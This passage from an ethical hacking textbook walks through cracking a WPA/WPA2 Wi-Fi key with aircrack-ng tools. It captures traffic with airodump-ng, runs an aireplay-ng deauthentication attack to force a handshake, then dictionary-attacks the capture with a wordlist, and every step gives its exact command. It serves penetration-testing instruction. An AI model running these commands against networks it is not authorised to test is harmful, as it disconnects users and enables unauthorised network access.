303
Capturing Packets
Step 3
—Next, we need to save the data associated with our access point to a specific file. The
inputs we need to specify are the channel, the bssid, and the file name to write.
Command
:
airodump-ng –c 1 –w rhawap --bssid F4:3E:61:92:68:D7 mon0
◾
–w—File to write
◾
–c—Channel
Capturing the Four-Way Handshake
Step 4
—In order to successfully crack WAP, we would need to capture the four-way handshake.
As mentioned, to achieve this we could use a deauthentication attack to force clients to dis-
connect and reconnect with the access point.
Structure_aireplay-ng_--deauth_10_–a_≤Target_AP≥_–c_≤Mac_address_of_Mon0≥mon0_Command'>Structure
aireplay-ng --deauth 10 –a ≤Target AP≥ –c ≤Mac address of Mon0≥mon0
Command
:
aireplay-ng --deauth 10 –a F4:3E:61:92:68:D7 –c 94:39:E5:EA:85:31 mon0
After we have successfully performed a deauthentication attack, we will be able to capture the
four-way handshake.
304
◾
Ethical Hacking and Penetration Testing Guide
Cracking WPA/WAP2
Now that we have all the inputs required for cracking the WPA/WPA PSK, we will use aircrack-
ng and specify a wordlist that would be used against the rhawap.cap file that was generated earlier.
Remember that in order for us to successfully crack the WPA/WPA2 PSK, we need to make sure
that our file contains the four-way handshake.
Structure
aircrack-ng –w Wordlist ‘capture_file’.cap
Command
:
aircrack-ng rhawap.cap –w/pentest/passwords/wordlists/darkc0de.lst
So, now this will start the dictionary attack against the rhawap.cap file, and if the key is found
in the dictionary, it will reveal it to us.
Wireless Hacking
◾
Dostları ilə paylaş: |
